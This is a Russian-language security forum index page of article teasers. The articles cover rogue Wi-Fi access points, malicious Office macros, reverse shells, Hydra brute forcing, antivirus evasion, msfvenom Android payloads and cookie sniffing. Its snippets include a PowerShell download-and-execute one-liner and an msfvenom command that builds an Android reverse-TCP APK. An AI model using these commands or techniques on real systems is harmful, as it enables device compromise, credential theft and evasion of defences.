Информац. безопасность

По данным последних исследований IT, каждые четыре секунды в компьютерную сеть компании попадает вредоносная программа и каждые 32 минуты за пределы организации уходит ценная информация. Утерянные данные могут стать источником манипуляций, поэтому так важно выстроить максимально эффективную защиту. Обеспечить информационную безопасность можно сотнями способов, сочетая разные продукты – антивирусы, межсетевые экраны, SSL-сертификаты, разграничение правд доступа, системы защиты от DDoS-атак. Важнейшей стороной информационной безопасности становится определение угроз, а это невозможно без определения объектов защиты. Только поняв, что и от чего мы защищаем, можно выстроить грамотную оборону. Сейчас актуален переход к облачным решениям, которые дают возможность быстро развёртывать системы безопасности, отдавая их управление поставщикам облачных сервисов. В этом разделе собраны актуальные материалы об информационной безопасности от построения информационной защиты до её оптимизации.

Soft Wi-Fi-Pumpkin v0.8.4

  • 21 348
  • 87
Всем привет! Рассмотрим в этой статье новую версию утилиты для пентестинга беспроводных сетей WiFi-Pumpkin v0.8.4, обновление вышло недавно, 22.12.2016. Я полагаю, с предыдущими версиями многие знакомы, поэтому мы не будем заострять внимание на применении этого инструмента, а сразу перейдем к особенностям и нововведениям. Вкратце, о нем - позволяет создать мошенническую точку доступа Wi-Fi, может использоваться для захвата учётных данных пользователя, как перехватом данных, так и фишингом. Итак, WiFi-Pumpkin Устанавливаем утилиту, я буду ставить на Kali Rolling 2016.2. > git clone...

Статья C чего начать свой путь? Добыча информация в 200х

  • 6 549
  • 6
Часть 6. Добыча информация в 200х Следующая часть C чего начать свой путь? Песочные войны Предыдущая часть C чего начать свой путь? Рынок 2000-х Все части -> с чего начать свой путь? В данном случае, речь пойдет именно об источниках информации, которые были доступны большей части, о совсем скрытых ресурсах могу сказать так: они были! В основном это ресурсы хороших, сильных группировок хакеров, энтузиастов, технических специалистов. Хранились все это, по большей части, на ФТП серверах и не всегда на своих ;) Приватные BBS, каналы mIRC (ИРКА). И частенько, эти каналы не были подняты на...

Статья C чего начать свой путь? Начало

  • 18 193
  • 43
Часть 1. Начало Следующая часть C чего начать свой путь? FIDONET Первая часть C чего начать свой путь? FIDONET Все части с чего начать свой путь? Моя тема не просьба о помощи или поиска наставника. Отнюдь. Я затрону немного истории, личных исканий, мытарств по теме, попробую ответить Вам самим на такой горячий вопрос -С ЧЕГО НАЧАТЬ? Давайте посмотрим на это иным взором, ведь так не бывает: Просыпаешься утром, потягиваешься, и тут БАЦ, решаешь быть специалистом в сфере IT, инженером информационной безопасности, мечом правосудия, гиком, фриком, великом гуру. Перед тем, как разум начинает...

Статья PowerShell для хакера (часть III) [LuckyStrike - создание вредоносных макросов]

  • 8 279
  • 26
Часть 3 Предыдущая часть Следующая часть Все части 3) Устанавливаем LuckyStrike и запускаем: iex (new-object net.webclient).downloadstring('https://raw.githubusercontent.com/Shellntel/luckystrike/master/install.ps1' Теперь создаем полезную нагрузку,я воспользуюсь своим скриптом ,о котором писал в прошлой статье Поднимаем листенер: Копипастим нашу команду в файлик с расширением .ps1, скрипт для powershell. Открываем LuckStrike и добавляем пейлоад в каталог: Далее выберем нашу полезную нагрузку для создания вредоносного файла: Создадим наш вредоносный документ...

Статья REVERSE или BIND shell? В чем разница?Какой выбрать?

  • 8 598
  • 12
Приветствую Вас колеги. Сегодня появилась необходимость написать небольшой мануал для новичков в котором я попытаюсь донести в чем же таки разница между REVERSE и BIND шеллом и какие самые распространенные способы его получить существуют. Это в первую очередь нужно мне для того что бы можно было ссылаться на этот мануал в своих статьях,и чаще всего я буду упоминать этот мануал при прохождении дальнейших тасков в лаборатории тестирования на проникновения. Итак.Для начала давайте попытаемся понять что такое SHELL? Ну если не кормить вас линками на википедию и всякие умные высказывания - то...

Статья THC-Hydra инструкция для чайников

  • 10 848
  • 4
C
Hydra нельзя отнести к простым и легко дающимся новичкам. Не надо отчаиваться, если вам не удалось оседлать hydra, я рекомендую вам посмотреть на программу BruteX. Она автоматизирует процесс подбора, более того, она использует ту же самую hydra, но сама вводит необходимые ключи и не нужно искать файлы с именами и паролями, поскольку они поставляются вместе с программой. ПРОТОКОЛ — это протокол, который вы хотите атаковать, например, ftp, smtp, http-get или любой из доступных: Asterisk, AFP, Cisco AAA, Cisco auth, Cisco enable, CVS, Firebird, FTP, HTTP-FORM-GET, HTTP-FORM-POST, HTTP-GET...

PowerShell для хакера (часть I )

  • 17 508
  • 50
Часть 1 Следующая часть Все части Приветствую Вас колеги. Как Вы уже поняли речь пойдет о знакомствах с базовыми возможностями PowerShell и области применения хакерских техних. И начнем мы пожалуй сегодня с использования скриптов PowerSploit -( скрипты написанные на PowerShell для пост эксплуатации Windows систем) Первым примером использования PowerSploit - это будет пример простого и быстрого получения метерпретер сессии на примере скрипта Invoke-Shellcode.ps1 Для начало сходим на гитхаб по ссылке: https://github.com/cheetz/PowerSploit/blob/master/CodeExecution/Invoke--Shellcode.ps1...

Статья Обход антивируса (Reverse Python Shell) 100% FUD

  • 8 778
  • 41
<~DarkNode~>
Привет.С вами DarkNode ) Сегодня будем обходить антивирус через Python Reverse TCP Shell. ТОЛЬКО ПОСЛЕ ПРОЧТЕНИЯ НЕ ВЗДУМАЙТЕ ***** СЛИВАТЬ БИНАРНИК НА ВТ (ВирусТотал) Итак наткнулся на гитхабе на прикольную реалиазацию reverse_tcp_shell через планировщик задач с использованием XML темплейта) Довольно таки прикольно имхо) Состоит наш бэкдор опять же таки из двух частей: Серверная часть: reverse_tcp.py - вредоносный питоновоский скрипт ,который запускается на стороне жертвы может быть упакован в "exe" файл используя pyinstaller На windows машине , выполните команду: pyinstaller...

Статья Parrot Security OS

  • 37 120
  • 126
Привет, в этой статье речь пойдет о достаточно новой операционной системе Parrot. Parrot Security OS (или ParrotSec) - является дистрибутивом GNU / Linux, на основе Debian. Он был спроектирован для того, чтобы выполнять тесты на проникновение (компьютерная безопасность) для оценки уязвимостей и смягчения последствий их использования, применяется он и в компьютерной криминалистике, а так же способен обеспечить анонимный серфинг. Был разработан командой Frozenbox. Среда рабочего стола является MATE, и менеджер дисплея по умолчанию LightDM. Проект сертифицирован для работы с машинами...

Soft Metasploit для будущих хакеров (msfvenom payload): Взломайте любой телефон на Android

  • 13 376
  • 17
The Codeby
Утилита Msfvenom в дистрибутиве kali linux используется для взлома android. Является комбинацией утилит Msfpayload и Msfencode, объединившей в себе оба инструмента в одну платформу Framework instance под названием msfvenom payload. Установка и использование msfvenom payload: 1. Запустите kali и откройте панель управления. 2. Установите payload и создайте всплывающее окно пользователя вот этой командой: root@kali:-# msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.110 LPORT=4444 R > andro.apk (Для того чтобы узнать свой LHOST, откройте новый терминал и введите ifconfig) Файл...

Статья Как украсть Cookies (Wireshark + Parrot)

  • 1 567
  • 2
И так поскольку мы начинаем цикл изучения Parrot Security OS я решил не оставаться без участия и выложить простой материал по данной теме. Нам с вами известно что программа Wireshark обладает незаменимым для нас функционалом. Ее самая приятная функций это перехват всего и вся для последующего анализа что часто отпугивает новичков от этого сокровища.(Возможно есть что-то другое но тут уж вы меня простите) Но я не стану вам объяснять все с самого начала а дам ссылочку -> Как пользоваться Wireshark . На нашем Попугае (Parrot Security OS я ее так называю) немного изменен дизайн программы...

Статья Хакерские плагины для Chrome

  • 2 766
  • 0
The Codeby
Это аналог статьи «Хакерские плагины для Firefox», т. е. если вы пользуетесь Firefox (а не Chrome), то вы знаете что делать. Все программы, в том числе и плагины, всегда скачивайте с официальных сайтов. Для плагинов браузера Chrome официальным сайтом является Интернет-магазин Chrome. Пусть нас не смущает слово «магазин» — все рассматриваемые ниже плагины бесплатные. Cookie Manager Управляет cookies и защищает приватность. Добавляет, редактирует и удаляет кукиз через панель инструментов. Может искать кукиз, если их много. Функции Поиск по кукиз Просмотр всех кукиз Просмотр кукиз по...